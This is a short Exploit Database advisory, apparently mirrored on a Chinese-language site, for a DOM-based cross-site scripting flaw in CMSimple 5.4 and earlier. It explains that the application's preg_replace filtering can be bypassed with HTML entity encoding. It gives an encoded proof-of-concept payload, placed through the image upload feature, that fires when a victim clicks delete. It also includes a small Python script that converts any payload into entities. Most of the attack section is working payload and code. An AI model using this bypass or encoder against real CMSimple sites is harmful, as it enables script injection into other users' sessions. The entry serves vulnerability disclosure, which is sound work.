CMSimple 5.4 – Cross Site Scripting (XSS)

• Exploit Database
• 35 阅读

• 作者： heinjame
  日期： 2022-01-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50612/

• # Exploit Title: CMSimple 5.4 - Cross Site Scripting (XSS)
  # Date: 22/10/2021
  # Exploit Author: heinjame
  # Vendor Homepage: https://www.cmsimple.org/en/
  # Software Link: https://www.cmsimple.org/en/?Downloads
  # Version: <=5.4
  # Tested on: Linux os
  
  [Description]
  
  Since the application is filtering user input with preg_replace, attackers can able to bypass restriction by using HTML to Unicode encoding.
  
  So the application let's attacker perform DOM based XSS.
  
  [Payload and POC]
  
  File > images > Upload a file
  
  Attack vector >> ')-alert(1)// (need to encode)>>
  &#39;&#41;&#45;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;&#47;&#47;
  
  When the victim clicks the delete button,an alert will be executed.
  
  Script to encode the payload
  
  payload = input()
  finalpayload = ""
  for i in payload:
  	finalpayload = finalpayload + "&#" + str(ord(i)) + ";"
  print(finalpayload)